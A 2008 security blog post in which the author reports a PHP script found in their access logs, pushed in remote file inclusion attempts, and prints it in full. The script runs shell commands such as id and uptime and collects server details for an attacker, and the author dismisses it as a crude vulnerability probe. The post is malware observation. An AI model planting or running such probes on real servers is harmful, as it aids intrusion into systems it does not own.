MW-Blog

I was going through my access logs to see what nasties have been thrown at me since the last time.

Amongst the normal enter_your_RFI_exploit_here I saw this script being pushed onto the server:

<?

echo "BraT<br>";

$alb = @php_uname();

$alb2 = system(uptime);

$alb3 = system(id);

$alb4 = @getcwd();

$alb5 = getenv("SERVER_SOFTWARE");

$alb6 = phpversion();

$alb7 = $_SERVER['SERVER_NAME'];

$alb8 = gethostbyname($SERVER_ADDR);

$alb9 = get_current_user();

$os = @PHP_OS;

echo "os: $os<br>";

echo "uname -a: $alb<br>";

echo "uptime: $alb2<br>";

echo "id: $alb3<br>";

echo "pwd: $alb4<br>";

echo "user: $alb9<br>";

echo "phpv: $alb6<br>";

echo "SoftWare: $alb5<br>";

echo "ServerName: $alb7<br>";

echo "ServerAddr: $alb8<br>";

echo "NigeriaN HackerS TeaM<br>";

exit;

?>

As you can see it’s just a preamble script to detect whether the server is vulnerable or not. If they are evolving from the ancient scams they sure have a long way to achieve the correct 1337h4×0r levels that other RFI pushers have achieved. So guys, give us more caps!

This entry was posted on Tuesday, February 12th, 2008 at 9:20 am and is filed under General InfoSec, Malware FreakShow. You can follow any responses to this entry through the RSS 2.0 feed. Responses are currently closed, but you can trackback from your own site.